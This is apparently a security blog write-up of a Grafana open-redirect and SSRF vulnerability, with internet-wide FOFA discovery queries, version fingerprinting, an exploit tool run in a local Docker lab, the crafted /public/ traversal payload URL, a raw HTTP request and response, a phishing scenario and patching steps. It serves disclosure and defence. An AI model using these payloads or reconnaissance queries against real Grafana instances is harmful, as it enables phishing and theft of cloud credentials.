CVE-2025–4123 Grafana Open Redirect & SSRF — Full PoC — CVSS 7.6 HIGH

Client-Side Path Traversal in /public/ · No Auth Required · Grafana < 12.0.0

Dharanis

~5 min read · March 26, 2026 (Updated: March 26, 2026) · Free: Yes

01 Overview

What is CVE-2025–4123?

CVE-2025–4123 is a high-severity vulnerability affecting Grafana — the industry-standard open-source observability platform deployed across millions of engineering stacks worldwide. Discovered by security researcher Alvaro Balada via Grafana's bug bounty program on April 26, 2025, it was publicly disclosed on May 21, 2025.

The root cause is a client-side path traversal flaw in Grafana's /public/ static file handler. By crafting a single malformed URL with encoded path separators, an attacker can escape the intended directory scope and trigger three distinct attack primitives — all without any authentication.

Open Redirect

Redirect victims to any external domain via a crafted Grafana URL. Trusted domain abused for phishing — no login needed.

Full-Read SSRF

Reach internal cloud metadata services (169.254.169.254) and internal APIs when the Grafana Image Renderer plugin is installed.

Stored XSS

Execute arbitrary JavaScript in a victim's browser when anonymous access is enabled — a common config for public dashboards.

// CVE-2025–4123 — full details table from official disclosure

02 Reconnaissance

Finding Grafana Instances with FOFA

FOFA is a cyberspace mapping engine widely used by bug bounty hunters and red teamers for asset discovery. Grafana exposes a unique favicon with a known hash — making it trivially fingerprinted across the internet regardless of URL structure or port number.

FOFA Queries

# Find ALL Grafana instances globally
app="Grafana"
# Target a specific bug bounty scope
domain="example.com" && icon_hash="2123863676"
OR
Host="example.com" && icon_hash="2123863676"

// FOFA query targeting a specific domain with Grafana favicon hash

Version Fingerprinting (No Auth Required)

Before sending any payload, confirm the Grafana version. The /api/health endpoint returns the exact build version with zero authentication:

curl http://TARGET:3000/api/health
# Response:
{
  "commit": "03f502a94d17f7dc4e6c34acdf8428aedd986e4c",
  "database": "ok",
  "version": "10.4.0"  ← VULNERABLE (< 12.0.0-security-01)
}

// /api/health leaking exact version — version 10.4.0 confirmed vulnerable

Version RangeStatus All 10.x < 10.4.14VULNERABLE All 11.x < backport patchVULNERABLE 12.0.0 (GA release)VULNERABLE >= 12.0.0-security-01PATCHED ✓

03 Lab Setup

Spinning Up a Vulnerable Lab with Docker

All testing was performed on Kali Linux using a locally containerized Grafana 10.4.0 instance — fully isolated and reproducible.

Step 1 — Clone Exploit Tool

# Clone the PoC tool
git clone https://github.com/ynsmroztas/CVE-2025-4123-Exploit-Tool-Grafana-
cd CVE-2025-4123-Exploit-Tool-Grafana-
# Install Python dependency
pip install requests

Step 2 — Launch Vulnerable Grafana Container

# Pull and run Grafana 10.4.0 (vulnerable)
docker run -d -p 3000:3000 grafana/grafana:10.4.0
# Verify it's live
curl http://127.0.0.1:3000/api/health

// Docker pulling grafana:10.4.0 — ~110MB across 7 layers, container on port 3000

04 Exploitation

Three Methods to Trigger the Vulnerability

⚠ Responsible Disclosure

All testing was conducted in an isolated local lab environment against a self-hosted container. Never test against production systems without explicit written authorization.

Method 1 — exploit.py Interactive Mode

Run the exploit tool against the local Grafana instance. It supports SSRF, LFI, and Open Redirect modes:

python3 cve_2025_4123_exploit_mitsec.py -u http://127.0.0.1:3000

For Open Redirect targeting google.com, the tool generates this crafted payload URL:

http://127.0.0.1:3000/public/..%2F%5cgoogle.com%2F%3f%2F..%2F..

The key trick here is the path traversal sequence using ..%2F (URL-encoded ../) combined with %5c (backslash) to escape the /public/ directory scope. Grafana's static file handler follows the redirect without validating the final destination.

Method 2 — Burp Suite Repeater

Manually sending the payload in Burp Suite confirms the raw HTTP behavior — a clean 302 Found response:

Burp Suite Repeater: 302 Found, Location: /\google.com/?/../..

GET /public/..%2F%5cgoogle.com%2F%3f%2F..%2F.. HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0
Accept: */*
Connection: close
---
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: /\google.com/?/../..
Date: Mon, 09 Mar 2026 11:45:41 GMT
Content-Length: 44
<a href="/\google.com/?/../..">Found</a>.

// Burp Suite Repeater confirming 302 → Location: /\google.com/?/../..

Method 3 — Browser Open Redirect (Live Demo)

When a victim clicks a crafted link or it loads inside a phishing iframe, their browser follows the 302 from the trusted Grafana domain — silently navigating to the attacker's site:

# Victim sees this URL (looks like a legitimate Grafana link):
http://grafana.company.com/public/..%2F%5Cgoogle.com%2F%3F%2F..%2F..
# Browser ends up at:
https://google.com/?/../..   ← or any attacker-controlled domain

// Browser OPEN REDIRECT CONFIRMED — Google.com loaded directly from the Grafana URL

Browser OPEN REDIRECT CONFIRMED: Google.com loaded from Grafana URL

05 Impact

Why This Matters at Scale

Grafana sits at the center of modern observability stacks — connected to Prometheus, databases, cloud accounts, CI/CD pipelines, and on-call systems. Compromise of Grafana frequently means access to every credential and data source it manages.

// Impact matrix and CVSS 7.6 High scoring breakdown

🔴 Critical Attack Scenario

Attacker sends a phishing email with a link to grafana.company.com/public/..%2F%5Cattacker.com... — the target sees a legitimate company domain in the URL, clicks it, and lands on a credential-harvesting page. The open redirect requires zero auth and works on any vulnerable instance regardless of Grafana's authentication settings.

Attack ModeImpactPrerequisite Open Redirect Phishing, credential theft, session hijacking None — works universally SSRF AWS/GCP/Azure IAM credentials, internal API access Image Renderer plugin installed LFI Read server-side files (config, keys, .env) Specific endpoint configuration XSS Arbitrary JS execution in victim's browser Anonymous access enabled

06 Remediation

How to Fix This Immediately

1 Upgrade Grafana to the patched version

The only complete fix is upgrading. All versions below the security patch remain vulnerable.

2 Pull the security release via Docker

docker pull grafana/grafana:12.0.0-security-01
docker stop grafana
docker run -d -p 3000:3000 grafana/grafana:12.0.0-security-01
# Verify patch
curl http://localhost:3000/api/health | grep version
# Must show >= 12.0.0-security-01

3 Check your version track for the minimum safe version

Grafana TrackMinimum Safe Version 12.x12.0.0-security-01 or 12.0.1+ 11.x11.6.1, 11.5.4, 11.4.3, 11.3.4, 11.2.8, 11.1.11, 11.0.11 10.x10.4.14, 10.3.18 9.x / 8.xEnd of Life — upgrade required

Temporary Hardening

While patching, consider placing Grafana behind a reverse proxy that strips or blocks requests containing %5c, %2F..%2F, or backslash sequences in the /public/ path. Also audit whether anonymous access is truly needed — disabling it removes the XSS vector.

References

▶ Exploit Tool: https://github.com/ynsmroztas/CVE-2025-4123-Exploit-Tool-Grafana-

▶ Official Grafana Advisory: https://grafana.com/blog/grafana-security-release-high-severity security-fix-for-cve-2025–4123/

▶ Grafana Security Advisory: https://grafana.com/security/security-advisories/cve-2025-4123/

▶ NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-4123

▶ IONIX Analysis: https://www.ionix.io/blog/grafana-cve-2025-4123-open-redirect-stored-xss patch/

▶ ProjectDiscovery Nuclei Template: https://cloud.projectdiscovery.io/library/CVE-2025-4123

▶ CVSS: 7.6 High — Discovered by Alvaro Balada — Disclosed: May 21, 2025

#ssrf #grafana #vapt #cybersecurity #bug-bounty